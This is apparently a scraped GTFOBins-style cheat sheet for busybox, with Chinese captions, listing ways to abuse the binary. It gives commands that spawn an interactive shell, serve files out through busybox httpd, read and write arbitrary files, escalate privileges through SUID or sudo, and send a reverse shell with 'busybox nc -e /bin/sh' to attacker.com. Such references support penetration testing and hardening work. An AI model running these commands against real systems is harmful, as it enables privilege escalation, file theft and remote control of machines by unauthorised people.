busybox --list-full to check what GTFOBins binaries are supported. Here some example.        用来生成一个交互式的系统shell。
busybox sh
                        
                                    上传文件到外部。
LPORT=12345
busybox httpd -f -p $LPORT -h .
                        
                                    将数据写入文件中。
LFILE=要写入的文件
busybox sh -c 'echo "DATA" > $LFILE'
                        
                                    从文件中读取数据。
LFILE=要读取的文件路径
./busybox cat "$LFILE"
                        
                                    suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
./busybox sh
                        
                                    如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo busybox sh
                        
                                    向监听的端口发送反向shell,以打开远程网络访问。
nc -lvp 12345 on the attacker box to receive the shell.                        RHOST=attacker.com
RPORT=12345
busybox nc -e /bin/sh $RHOST $RPORT